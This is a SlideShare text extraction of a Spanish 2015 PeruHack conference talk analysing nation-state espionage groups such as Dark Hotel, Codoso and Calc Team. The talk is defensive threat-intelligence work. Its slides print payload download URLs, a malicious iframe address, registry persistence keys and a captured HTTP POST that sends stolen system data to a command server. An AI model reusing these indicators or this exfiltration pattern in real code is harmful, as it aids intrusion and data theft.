SlideShare una empresa de Scribd logo
1 de 44
Descargar para leer sin conexión
CyberespionajedeNaciones
#PeruHack2015
MauricioVelazco
@mvelazco
#whoami
▪ SecurityGeek(6+anhos)
▪ BlueTeam:GestiondeVulns,RespuestaaIncidentes,
ThreatIntelligence,etc.
▪ ThreatHunting
▪ AlgunasCerts:
OCSP,CEH,CPTE,ECSA
▪ @mvelazco
Cyber Espionaje
▪ Elusodeataquesinformaticosparaobteneraccesoa
informacionconfidencialoconfinesdesabotaje.
▪ Tipicamentellevadoacaboporungobierno;bien
estructuradoyconaccesoarecursos~ilimitados
▪ APT(AdvancedPersistentThreat)
Stuxnet - Agosto 2010
▪ Operacion“OlympicGames”
▪ EEEUeIsrael
▪ Objetivo:afectarelenriquicimientodeUranioenlacentral
nucleardeNatanz,Iran
▪ Exploto4 Zero Days
▪ Limahack2011
APT 1 Report – Febrero 2013
http://intelreport.mandiant.com/Mandiant_APT1_Report.pdf
Mayo 2014
Post Snowden
Junio 2013
OPM – Junio 2015
Hacking Team – Julio 2015
Cómo lo hacen ?
The Cyber Kill Chain
Intelligence-Driven Computer Network
Defense Informed by Analysis of Adversary
Campaigns and Intrusion Kill Chains
Lockheed Martin, 2011
RSA - 2011
Analisis Tecnico
Dark Hotel Team
▪ GrupodecyberespionajeconnexosaCoreadelSuractivo
desdeel2010.
▪ Enfocadoencomprometerorganizacionesasociadascon
diplomacia,politicainternacional,seguridad&defensa.
▪ Gobiernosatacadosincluyen:Japon,Taiwan,China,Rusia,
TailandiayUSA.
Dark Hotel Team – TTPs
▪ Correos“SpearPhishing”utilizandotemasdeinterespara
lasvictimas
▪ Hautilizadovulnerabilidades0day
▪ CVE-2014-0497yCVE-2009-4324
▪ Troyanohechoamedida:Tapaoux
▪ MetodosdeInfeccion
▪ BinariosconRight-to-leftoverride(RTLO)
▪ ArchivosHTA
▪ Macrosembebidas
▪ ScriptsJavascript
Dark Hotel Team – TTPs
▪ RTLOesuncaracterUnicode(U+202e)diseñadopara
soportarlenguajesqueseescribendederechaaizquierda.
▪ Estecaracterpuedeserabusadoparahacercreerque
archivosmaliciososnoloson.
Dark Hotel Team – TTPs
Dark Hotel Team – Campanha #1
▪ SpearPhishingconunarchivoraratachadoquecontiene
unbinarioutilizandoRTLO:letter_rcs.jpg.
▪ Alejecutarse,elbinarioescribe:
▪ letter_rcs.jpg–Imageninocua
▪ u.js–ScriptJavascriptmalicioso
▪ EnWindows,pordefecto,abrirunarchivoconextension
.JSinvoca Windowsscriptinghost(WSH). a
wscript.exe
Dark Hotel Team – Campanha #1
Dark Hotel Team – Campanha #1
▪ U.jsdescargayejecutaotroJavscriptde
hxxp://xxx.info/decod9/unzip.js
▪ Unzip.jsdescarga
hxxp://xxx.info/open99/office32loguardaen
%TEMP%csrtsrm.exe yloejecuta(payload)
▪ Eltroyanodescargaotrosmodulosconelfindeexfiltracion
▪ Keylogger
%APPDATA%MicrosoftWindowssystem64srmsr.exe
▪ DocumentScrapping
%APPDATA%MicrosoftWindowssystem64xsrmsd.exe
Dark Hotel Team – Campanha #1
▪ xsrmsd.exeencuentratodoslos.doc, .pdf, .xls, .txty
creaunarchivocomprimidoconpassword
12345qwert!!
▪ Llave:HKEY_LOCAL_MACHINESOFTWAREMicrosoftActiveSetupInstalled
Components{50036903-7717-484a-9345-7AE5FF85DCE9}StubPath
Valor:%WINDIR%system32csntzjy.exe
%APPDATA%MicrosoftWindowsExplorercsntzjy.exe
Dark Hotel Team – Campanha #2
▪ DarkHotelcomprometiolaseguridaddehotelesdelujoy
mantuvoaccesoparaserusadocuandoseanecesario.
▪ Losobjetivossonusualmentealtosejecutivosdedistintas
industriasconinteresesenlaregionasiatica.
▪ Alconectarsealareddelhotel,elobjetivorecibeun
mensajedeactualizaciondeGoogle Toolbar,Adobe
FlashoWindows Messenger.
▪ Kaspersky
Codoso Team
▪ ActivodesdeAbril2011;tienevinculosconChina.
▪ Conduceintrusionesderedcomosoporteparaunesfuerzo
decolecciondeinteligenciaglobal
▪ Verticalesafectadasincluyen
▪ Energia
▪ Finanzas
▪ Defenss
▪ Gobierno
▪ DisidentesPoliticos
Codoso Team - TTPs
▪ SpearPhishingemails
▪ Waterholing
▪ Hanutilizadovulnerabidades0day
▪ Troyanohechoamedida:Mad Hatter/Codoso
▪ Utilizancorreosseñueloscontemasrelacioadosa
problemasconChina,eventosmundialesypolitica
internacional.
Codoso Team – Campanha 1
▪ Ennoviembredel2014,Codosoinfectolaconocidaweb
forbes.com einyectouniframemalicioso:
http://74.207.254.87/83a08vkzvt/8hthrx.swf
▪ Elobjectivo:explotar2vulnerabilidades0dayenFlash
Player(CVE-2014-9163)eInternetExplorer9+
(CVE-2015-0071)
▪ SiesXPsoloseutilizaCVE-2014-9163,perosies
Vista+exploitatambienIEparabypasseasASLR
Codoso Team – Campanha 1
▪ Checks
Codoso Team – Campanha 1
▪ ElexploitdescargaunaDLL(wuservice.dll)ylacarga
en memoria.
▪ EstaDLLenumeraelequipoejecutandocomandosde
reconocimiento:systeminfo, ipconfig, tasklist.
▪ EnvialainformacionrecaudadaenelVIEWSTATEbase
64
▪ UnasegundaDLLcifradaconXOR(0x67)esdescargadae
inyectadaenmemoria.
Calc Team
▪ Activodesdeel2009,grupodeespionajeconnexosa
China.
▪ HistoricamentesusobjetivoshansidoTaiwanyUSAconel
finderecolectarinteligencia.
▪ Tecnicapreferida:Correoselectronicos+ingenieriasocial
utilizandosiempretemasdegeopolitica.
▪ Explotovulnerabilidadesyaparchadas
▪ Utiliza3“familias”demalware
Calc Team – Campanha 1
▪ Spearphishing,“G20 Briefing Paper.zip” que
contiene2binariosmaliciosos(.exe)
▪ G20DiscussionPaper.exe
▪ GPFIWorkPlan2013.exe
▪ LosbinariosescribenyabrenunarchivoPDFlegitimocon
elvisorpordefecto.
▪ Secopiaa%TEMP%, ycreaunallavederegistropara
serejecutadocuandoelequipoinicia (KeyLoggery
dropper)
▪ Alcopiarse,seejecutaconelparametro“again”ycontacta
astatus.acmetoy.com
Calc Team – Campanha 1
Calc Team – Campanha 1
Calc Team – Campanha 2
▪ Noviembre2015,APEC
▪ BriefingPaperonthePresident'sScheduleduringtheAPEC
LeadersMeeting.zip
▪ Hojadecalculo(.xls)conunmacroobfuscadoembebido.
▪ Escribe
▪ %TEMP%AELMEntertainmentbudgetandAttendanceallowance.xls
▪ %TEMP%1C234643A8A8.tmp–Scriptdelimpieza
▪ %TEMP%1C224643A8B8.js –MalwareenJS
▪ HKCUSoftwareMicrosoftWindowsCurrentVersionRun
network
Calc Team – Campanha 2
Calc Team – Campanha 2
Calc Team – Campanha 2
Calc Team – Campanha 2
▪ POST/common.phpHTTP/1.1
Content-Type:application/x-www-form-urlencoded
User-Agent:Mozilla/5.0(compatible;MSIE9.0;WindowsNT6.1;
Trident/5.0)
Referer:https://www.google.com
Content-Length:248
Accept:*/*
Host:presentation.twilightXXXXXX.com
Connection:Keep-Alive
action=aaa&data=NzQzMDFjYzNjOWVmOTBiNDIzZDdiNDI
0ZDI2NDNiMGZ8MTcyLjE2LjI1NS4yfFdJTFNPTk5FTEx
ZfFdJTFNPTk5FTExZXEFkbWluaXN0cmF0b3IoYWRta
W5pc3RyYXRvcil8TWljcm9zb2Z0IFdpbmRvd3MgWF
AgUHJvZmVzc2lvbmFsfDE3Mi4xNi4yNTUuMTo4ODg
4fGpzbmVbMS40XSxpbXB0LHByfA%3D%3D
Winnti Team
▪ Identificadoen2009
▪ Susataqueshansidoenfocadosalaindustriadejuegos
primariamentepararobarcertificadosdigitalesque
permitansoportenactividadesdecyberespionajeaotros
objetivos.
▪ Nexosconotrosgruposdeespionajeconloscuales
compartecertificadosdigitales
X Team
X Team
X Team
X Team
X Team
Conclusiones
▪ AdvancedPersistentThreat?
▪ ElCyberEsiponajecontinuaraimplementandocuanta
tecnicapuedasiempreycuandoseaefectiva
▪ Gruposdeespionajeorientalesutilizanlainformacion
recaudaparafortacelersuindustriainernamientrasque
occidentetieneotrosfines.
▪ Sudamerica?Peru?
CyberespionajedeNaciones
#PeruHack2015
MauricioVelazco
@mvelazco

Más contenido relacionado

Más de Mauricio Velazco

PurpleSharp BlackHat Arsenal Asia
PurpleSharp BlackHat Arsenal AsiaPurpleSharp BlackHat Arsenal Asia
PurpleSharp BlackHat Arsenal AsiaMauricio Velazco
 
Detection-as-Code: Test Driven Detection Development.pdf
Detection-as-Code: Test Driven Detection Development.pdfDetection-as-Code: Test Driven Detection Development.pdf
Detection-as-Code: Test Driven Detection Development.pdfMauricio Velazco
 
BlackHat Arsenal 2021 : PurpleSharp - Active Directory Attack Simulations
BlackHat Arsenal 2021 : PurpleSharp - Active Directory Attack SimulationsBlackHat Arsenal 2021 : PurpleSharp - Active Directory Attack Simulations
BlackHat Arsenal 2021 : PurpleSharp - Active Directory Attack SimulationsMauricio Velazco
 
Defcon 29 Adversary Village: PurpleSharp - Automated Adversary Simulation
Defcon 29 Adversary Village: PurpleSharp - Automated Adversary SimulationDefcon 29 Adversary Village: PurpleSharp - Automated Adversary Simulation
Defcon 29 Adversary Village: PurpleSharp - Automated Adversary SimulationMauricio Velazco
 
SANS Purple Team Summit 2021: Active Directory Purple Team Playbooks
SANS Purple Team Summit 2021: Active Directory Purple Team PlaybooksSANS Purple Team Summit 2021: Active Directory Purple Team Playbooks
SANS Purple Team Summit 2021: Active Directory Purple Team PlaybooksMauricio Velazco
 
Defcon Blue Team Village 2020: Purple On My Mind: Cost Effective Automated Ad...
Defcon Blue Team Village 2020: Purple On My Mind: Cost Effective Automated Ad...Defcon Blue Team Village 2020: Purple On My Mind: Cost Effective Automated Ad...
Defcon Blue Team Village 2020: Purple On My Mind: Cost Effective Automated Ad...Mauricio Velazco
 
BlackHat 2020 Arsenal - PurpleSharp: Adversary Simulation for the Blue Team
BlackHat 2020 Arsenal - PurpleSharp: Adversary Simulation for the Blue TeamBlackHat 2020 Arsenal - PurpleSharp: Adversary Simulation for the Blue Team
BlackHat 2020 Arsenal - PurpleSharp: Adversary Simulation for the Blue TeamMauricio Velazco
 
Bsides NYC 2018 - Hunting for Lateral Movement
Bsides NYC 2018 - Hunting for Lateral MovementBsides NYC 2018 - Hunting for Lateral Movement
Bsides NYC 2018 - Hunting for Lateral MovementMauricio Velazco
 
LimaHack 2011 - Stuxnet : El arma del futuro
LimaHack 2011 - Stuxnet : El arma del futuroLimaHack 2011 - Stuxnet : El arma del futuro
LimaHack 2011 - Stuxnet : El arma del futuroMauricio Velazco
 
PeruHack 2014 - Post Explotacion en Entornos Windows
PeruHack 2014 - Post Explotacion en Entornos WindowsPeruHack 2014 - Post Explotacion en Entornos Windows
PeruHack 2014 - Post Explotacion en Entornos WindowsMauricio Velazco
 
Limahack 2010 - Creando exploits para GNU/Linux
Limahack 2010 - Creando exploits para GNU/LinuxLimahack 2010 - Creando exploits para GNU/Linux
Limahack 2010 - Creando exploits para GNU/LinuxMauricio Velazco
 
Limahack 2009 - SSL no esta roto ... o si ?
Limahack 2009 - SSL no esta roto ... o si ?Limahack 2009 - SSL no esta roto ... o si ?
Limahack 2009 - SSL no esta roto ... o si ?Mauricio Velazco
 
ATT&CKcon 2.0 2019 - Tracking and measuring your ATT&CK coverage with ATT&CK2...
ATT&CKcon 2.0 2019 - Tracking and measuring your ATT&CK coverage with ATT&CK2...ATT&CKcon 2.0 2019 - Tracking and measuring your ATT&CK coverage with ATT&CK2...
ATT&CKcon 2.0 2019 - Tracking and measuring your ATT&CK coverage with ATT&CK2...Mauricio Velazco
 
SANS Threat Hunting Summit 2018 - Hunting Lateral Movement with Windows Event...
SANS Threat Hunting Summit 2018 - Hunting Lateral Movement with Windows Event...SANS Threat Hunting Summit 2018 - Hunting Lateral Movement with Windows Event...
SANS Threat Hunting Summit 2018 - Hunting Lateral Movement with Windows Event...Mauricio Velazco
 
Defcon 27 - Writing custom backdoor payloads with C#
Defcon 27 - Writing custom backdoor payloads with C#Defcon 27 - Writing custom backdoor payloads with C#
Defcon 27 - Writing custom backdoor payloads with C#Mauricio Velazco
 
Derbycon 2017: Hunting Lateral Movement For Fun & Profit
Derbycon 2017: Hunting Lateral Movement For Fun & ProfitDerbycon 2017: Hunting Lateral Movement For Fun & Profit
Derbycon 2017: Hunting Lateral Movement For Fun & ProfitMauricio Velazco
 
Bsides Baltimore 2019: Embrace the Red Enhancing detection capabilities with ...
Bsides Baltimore 2019: Embrace the Red Enhancing detection capabilities with ...Bsides Baltimore 2019: Embrace the Red Enhancing detection capabilities with ...
Bsides Baltimore 2019: Embrace the Red Enhancing detection capabilities with ...Mauricio Velazco
 

Más de Mauricio Velazco (20)

PurpleSharp BlackHat Arsenal Asia
PurpleSharp BlackHat Arsenal AsiaPurpleSharp BlackHat Arsenal Asia
PurpleSharp BlackHat Arsenal Asia
 
Detection-as-Code: Test Driven Detection Development.pdf
Detection-as-Code: Test Driven Detection Development.pdfDetection-as-Code: Test Driven Detection Development.pdf
Detection-as-Code: Test Driven Detection Development.pdf
 
BSides Panama 2022
BSides Panama 2022BSides Panama 2022
BSides Panama 2022
 
BlackHat Arsenal 2021 : PurpleSharp - Active Directory Attack Simulations
BlackHat Arsenal 2021 : PurpleSharp - Active Directory Attack SimulationsBlackHat Arsenal 2021 : PurpleSharp - Active Directory Attack Simulations
BlackHat Arsenal 2021 : PurpleSharp - Active Directory Attack Simulations
 
Defcon 29 Adversary Village: PurpleSharp - Automated Adversary Simulation
Defcon 29 Adversary Village: PurpleSharp - Automated Adversary SimulationDefcon 29 Adversary Village: PurpleSharp - Automated Adversary Simulation
Defcon 29 Adversary Village: PurpleSharp - Automated Adversary Simulation
 
SANS Purple Team Summit 2021: Active Directory Purple Team Playbooks
SANS Purple Team Summit 2021: Active Directory Purple Team PlaybooksSANS Purple Team Summit 2021: Active Directory Purple Team Playbooks
SANS Purple Team Summit 2021: Active Directory Purple Team Playbooks
 
Defcon Blue Team Village 2020: Purple On My Mind: Cost Effective Automated Ad...
Defcon Blue Team Village 2020: Purple On My Mind: Cost Effective Automated Ad...Defcon Blue Team Village 2020: Purple On My Mind: Cost Effective Automated Ad...
Defcon Blue Team Village 2020: Purple On My Mind: Cost Effective Automated Ad...
 
BlackHat 2020 Arsenal - PurpleSharp: Adversary Simulation for the Blue Team
BlackHat 2020 Arsenal - PurpleSharp: Adversary Simulation for the Blue TeamBlackHat 2020 Arsenal - PurpleSharp: Adversary Simulation for the Blue Team
BlackHat 2020 Arsenal - PurpleSharp: Adversary Simulation for the Blue Team
 
Bsides NYC 2018 - Hunting for Lateral Movement
Bsides NYC 2018 - Hunting for Lateral MovementBsides NYC 2018 - Hunting for Lateral Movement
Bsides NYC 2018 - Hunting for Lateral Movement
 
LimaHack 2011 - Stuxnet : El arma del futuro
LimaHack 2011 - Stuxnet : El arma del futuroLimaHack 2011 - Stuxnet : El arma del futuro
LimaHack 2011 - Stuxnet : El arma del futuro
 
PeruHack 2014 - Post Explotacion en Entornos Windows
PeruHack 2014 - Post Explotacion en Entornos WindowsPeruHack 2014 - Post Explotacion en Entornos Windows
PeruHack 2014 - Post Explotacion en Entornos Windows
 
Limahack 2010 - Creando exploits para GNU/Linux
Limahack 2010 - Creando exploits para GNU/LinuxLimahack 2010 - Creando exploits para GNU/Linux
Limahack 2010 - Creando exploits para GNU/Linux
 
Limahack 2009 - SSL no esta roto ... o si ?
Limahack 2009 - SSL no esta roto ... o si ?Limahack 2009 - SSL no esta roto ... o si ?
Limahack 2009 - SSL no esta roto ... o si ?
 
Bsides Latam 2019
Bsides Latam 2019Bsides Latam 2019
Bsides Latam 2019
 
ATT&CKcon 2.0 2019 - Tracking and measuring your ATT&CK coverage with ATT&CK2...
ATT&CKcon 2.0 2019 - Tracking and measuring your ATT&CK coverage with ATT&CK2...ATT&CKcon 2.0 2019 - Tracking and measuring your ATT&CK coverage with ATT&CK2...
ATT&CKcon 2.0 2019 - Tracking and measuring your ATT&CK coverage with ATT&CK2...
 
SANS Threat Hunting Summit 2018 - Hunting Lateral Movement with Windows Event...
SANS Threat Hunting Summit 2018 - Hunting Lateral Movement with Windows Event...SANS Threat Hunting Summit 2018 - Hunting Lateral Movement with Windows Event...
SANS Threat Hunting Summit 2018 - Hunting Lateral Movement with Windows Event...
 
Defcon 27 - Writing custom backdoor payloads with C#
Defcon 27 - Writing custom backdoor payloads with C#Defcon 27 - Writing custom backdoor payloads with C#
Defcon 27 - Writing custom backdoor payloads with C#
 
Derbycon 2017: Hunting Lateral Movement For Fun & Profit
Derbycon 2017: Hunting Lateral Movement For Fun & ProfitDerbycon 2017: Hunting Lateral Movement For Fun & Profit
Derbycon 2017: Hunting Lateral Movement For Fun & Profit
 
Bsides Long Island 2019
Bsides Long Island 2019Bsides Long Island 2019
Bsides Long Island 2019
 
Bsides Baltimore 2019: Embrace the Red Enhancing detection capabilities with ...
Bsides Baltimore 2019: Embrace the Red Enhancing detection capabilities with ...Bsides Baltimore 2019: Embrace the Red Enhancing detection capabilities with ...
Bsides Baltimore 2019: Embrace the Red Enhancing detection capabilities with ...
 

Último

Presentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidadPresentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidadMiguelAngelVillanuev48
 
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptxCrear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptxNombre Apellidos
 
El uso delas tic en la vida cotidiana MFEL
El uso delas tic en la vida cotidiana MFELEl uso delas tic en la vida cotidiana MFEL
El uso delas tic en la vida cotidiana MFELmaryfer27m
 
trabajotecologiaisabella-240424003133-8f126965.pdf
trabajotecologiaisabella-240424003133-8f126965.pdftrabajotecologiaisabella-240424003133-8f126965.pdf
trabajotecologiaisabella-240424003133-8f126965.pdfIsabellaMontaomurill
 
Cortes-24-de-abril-Tungurahua-3 año 2024
Cortes-24-de-abril-Tungurahua-3 año 2024Cortes-24-de-abril-Tungurahua-3 año 2024
Cortes-24-de-abril-Tungurahua-3 año 2024GiovanniJavierHidalg
 
ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...
ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...
ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...FacuMeza2
 
GonzalezGonzalez_Karina_M1S3AI6... .pptx
GonzalezGonzalez_Karina_M1S3AI6... .pptxGonzalezGonzalez_Karina_M1S3AI6... .pptx
GonzalezGonzalez_Karina_M1S3AI6... .pptx241523733
 
R1600G CAT Variables de cargadores en mina
R1600G CAT Variables de cargadores en minaR1600G CAT Variables de cargadores en mina
R1600G CAT Variables de cargadores en minaarkananubis
 
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptxMedidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptxaylincamaho
 
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIA
Actividad integradora 6    CREAR UN RECURSO MULTIMEDIAActividad integradora 6    CREAR UN RECURSO MULTIMEDIA
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIA241531640
 
Plan de aula informatica segundo periodo.docx
Plan de aula informatica segundo periodo.docxPlan de aula informatica segundo periodo.docx
Plan de aula informatica segundo periodo.docxpabonheidy28
 
El uso de las TIC's en la vida cotidiana.
El uso de las TIC's en la vida cotidiana.El uso de las TIC's en la vida cotidiana.
El uso de las TIC's en la vida cotidiana.241514949
 
El uso de las tic en la vida ,lo importante que son
El uso de las tic en la vida ,lo importante  que sonEl uso de las tic en la vida ,lo importante  que son
El uso de las tic en la vida ,lo importante que son241514984
 
La era de la educación digital y sus desafios
La era de la educación digital y sus desafiosLa era de la educación digital y sus desafios
La era de la educación digital y sus desafiosFundación YOD YOD
 
tics en la vida cotidiana prepa en linea modulo 1.pptx
tics en la vida cotidiana prepa en linea modulo 1.pptxtics en la vida cotidiana prepa en linea modulo 1.pptx
tics en la vida cotidiana prepa en linea modulo 1.pptxazmysanros90
 
Mapa-conceptual-del-Origen-del-Universo-3.pptx
Mapa-conceptual-del-Origen-del-Universo-3.pptxMapa-conceptual-del-Origen-del-Universo-3.pptx
Mapa-conceptual-del-Origen-del-Universo-3.pptxMidwarHenryLOZAFLORE
 
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdfPARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdfSergioMendoza354770
 
Arenas Camacho-Practica tarea Sesión 12.pptx
Arenas Camacho-Practica tarea Sesión 12.pptxArenas Camacho-Practica tarea Sesión 12.pptx
Arenas Camacho-Practica tarea Sesión 12.pptxJOSEFERNANDOARENASCA
 
dokumen.tips_36274588-sistema-heui-eui.ppt
dokumen.tips_36274588-sistema-heui-eui.pptdokumen.tips_36274588-sistema-heui-eui.ppt
dokumen.tips_36274588-sistema-heui-eui.pptMiguelAtencio10
 
FloresMorales_Montserrath_M1S3AI6 (1).pptx
FloresMorales_Montserrath_M1S3AI6 (1).pptxFloresMorales_Montserrath_M1S3AI6 (1).pptx
FloresMorales_Montserrath_M1S3AI6 (1).pptx241522327
 

Último (20)

Presentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidadPresentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidad
 
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptxCrear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
 
El uso delas tic en la vida cotidiana MFEL
El uso delas tic en la vida cotidiana MFELEl uso delas tic en la vida cotidiana MFEL
El uso delas tic en la vida cotidiana MFEL
 
trabajotecologiaisabella-240424003133-8f126965.pdf
trabajotecologiaisabella-240424003133-8f126965.pdftrabajotecologiaisabella-240424003133-8f126965.pdf
trabajotecologiaisabella-240424003133-8f126965.pdf
 
Cortes-24-de-abril-Tungurahua-3 año 2024
Cortes-24-de-abril-Tungurahua-3 año 2024Cortes-24-de-abril-Tungurahua-3 año 2024
Cortes-24-de-abril-Tungurahua-3 año 2024
 
ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...
ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...
ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...
 
GonzalezGonzalez_Karina_M1S3AI6... .pptx
GonzalezGonzalez_Karina_M1S3AI6... .pptxGonzalezGonzalez_Karina_M1S3AI6... .pptx
GonzalezGonzalez_Karina_M1S3AI6... .pptx
 
R1600G CAT Variables de cargadores en mina
R1600G CAT Variables de cargadores en minaR1600G CAT Variables de cargadores en mina
R1600G CAT Variables de cargadores en mina
 
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptxMedidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
 
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIA
Actividad integradora 6    CREAR UN RECURSO MULTIMEDIAActividad integradora 6    CREAR UN RECURSO MULTIMEDIA
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIA
 
Plan de aula informatica segundo periodo.docx
Plan de aula informatica segundo periodo.docxPlan de aula informatica segundo periodo.docx
Plan de aula informatica segundo periodo.docx
 
El uso de las TIC's en la vida cotidiana.
El uso de las TIC's en la vida cotidiana.El uso de las TIC's en la vida cotidiana.
El uso de las TIC's en la vida cotidiana.
 
El uso de las tic en la vida ,lo importante que son
El uso de las tic en la vida ,lo importante  que sonEl uso de las tic en la vida ,lo importante  que son
El uso de las tic en la vida ,lo importante que son
 
La era de la educación digital y sus desafios
La era de la educación digital y sus desafiosLa era de la educación digital y sus desafios
La era de la educación digital y sus desafios
 
tics en la vida cotidiana prepa en linea modulo 1.pptx
tics en la vida cotidiana prepa en linea modulo 1.pptxtics en la vida cotidiana prepa en linea modulo 1.pptx
tics en la vida cotidiana prepa en linea modulo 1.pptx
 
Mapa-conceptual-del-Origen-del-Universo-3.pptx
Mapa-conceptual-del-Origen-del-Universo-3.pptxMapa-conceptual-del-Origen-del-Universo-3.pptx
Mapa-conceptual-del-Origen-del-Universo-3.pptx
 
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdfPARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
 
Arenas Camacho-Practica tarea Sesión 12.pptx
Arenas Camacho-Practica tarea Sesión 12.pptxArenas Camacho-Practica tarea Sesión 12.pptx
Arenas Camacho-Practica tarea Sesión 12.pptx
 
dokumen.tips_36274588-sistema-heui-eui.ppt
dokumen.tips_36274588-sistema-heui-eui.pptdokumen.tips_36274588-sistema-heui-eui.ppt
dokumen.tips_36274588-sistema-heui-eui.ppt
 
FloresMorales_Montserrath_M1S3AI6 (1).pptx
FloresMorales_Montserrath_M1S3AI6 (1).pptxFloresMorales_Montserrath_M1S3AI6 (1).pptx
FloresMorales_Montserrath_M1S3AI6 (1).pptx
 

Peruhack 2015 - Cyberespionaje de Naciones

  • 3. Cyber Espionaje ▪ Elusodeataquesinformaticosparaobteneraccesoa informacionconfidencialoconfinesdesabotaje. ▪ Tipicamentellevadoacaboporungobierno;bien estructuradoyconaccesoarecursos~ilimitados ▪ APT(AdvancedPersistentThreat)
  • 4. Stuxnet - Agosto 2010 ▪ Operacion“OlympicGames” ▪ EEEUeIsrael ▪ Objetivo:afectarelenriquicimientodeUranioenlacentral nucleardeNatanz,Iran ▪ Exploto4 Zero Days ▪ Limahack2011
  • 5. APT 1 Report – Febrero 2013 http://intelreport.mandiant.com/Mandiant_APT1_Report.pdf
  • 9. Hacking Team – Julio 2015
  • 11. The Cyber Kill Chain Intelligence-Driven Computer Network Defense Informed by Analysis of Adversary Campaigns and Intrusion Kill Chains Lockheed Martin, 2011
  • 14. Dark Hotel Team ▪ GrupodecyberespionajeconnexosaCoreadelSuractivo desdeel2010. ▪ Enfocadoencomprometerorganizacionesasociadascon diplomacia,politicainternacional,seguridad&defensa. ▪ Gobiernosatacadosincluyen:Japon,Taiwan,China,Rusia, TailandiayUSA.
  • 15. Dark Hotel Team – TTPs ▪ Correos“SpearPhishing”utilizandotemasdeinterespara lasvictimas ▪ Hautilizadovulnerabilidades0day ▪ CVE-2014-0497yCVE-2009-4324 ▪ Troyanohechoamedida:Tapaoux ▪ MetodosdeInfeccion ▪ BinariosconRight-to-leftoverride(RTLO) ▪ ArchivosHTA ▪ Macrosembebidas ▪ ScriptsJavascript
  • 16. Dark Hotel Team – TTPs ▪ RTLOesuncaracterUnicode(U+202e)diseñadopara soportarlenguajesqueseescribendederechaaizquierda. ▪ Estecaracterpuedeserabusadoparahacercreerque archivosmaliciososnoloson.
  • 17. Dark Hotel Team – TTPs
  • 18. Dark Hotel Team – Campanha #1 ▪ SpearPhishingconunarchivoraratachadoquecontiene unbinarioutilizandoRTLO:letter_rcs.jpg. ▪ Alejecutarse,elbinarioescribe: ▪ letter_rcs.jpg–Imageninocua ▪ u.js–ScriptJavascriptmalicioso ▪ EnWindows,pordefecto,abrirunarchivoconextension .JSinvoca Windowsscriptinghost(WSH). a wscript.exe
  • 19. Dark Hotel Team – Campanha #1
  • 20. Dark Hotel Team – Campanha #1 ▪ U.jsdescargayejecutaotroJavscriptde hxxp://xxx.info/decod9/unzip.js ▪ Unzip.jsdescarga hxxp://xxx.info/open99/office32loguardaen %TEMP%csrtsrm.exe yloejecuta(payload) ▪ Eltroyanodescargaotrosmodulosconelfindeexfiltracion ▪ Keylogger %APPDATA%MicrosoftWindowssystem64srmsr.exe ▪ DocumentScrapping %APPDATA%MicrosoftWindowssystem64xsrmsd.exe
  • 21. Dark Hotel Team – Campanha #1 ▪ xsrmsd.exeencuentratodoslos.doc, .pdf, .xls, .txty creaunarchivocomprimidoconpassword 12345qwert!! ▪ Llave:HKEY_LOCAL_MACHINESOFTWAREMicrosoftActiveSetupInstalled Components{50036903-7717-484a-9345-7AE5FF85DCE9}StubPath Valor:%WINDIR%system32csntzjy.exe %APPDATA%MicrosoftWindowsExplorercsntzjy.exe
  • 22. Dark Hotel Team – Campanha #2 ▪ DarkHotelcomprometiolaseguridaddehotelesdelujoy mantuvoaccesoparaserusadocuandoseanecesario. ▪ Losobjetivossonusualmentealtosejecutivosdedistintas industriasconinteresesenlaregionasiatica. ▪ Alconectarsealareddelhotel,elobjetivorecibeun mensajedeactualizaciondeGoogle Toolbar,Adobe FlashoWindows Messenger. ▪ Kaspersky
  • 23. Codoso Team ▪ ActivodesdeAbril2011;tienevinculosconChina. ▪ Conduceintrusionesderedcomosoporteparaunesfuerzo decolecciondeinteligenciaglobal ▪ Verticalesafectadasincluyen ▪ Energia ▪ Finanzas ▪ Defenss ▪ Gobierno ▪ DisidentesPoliticos
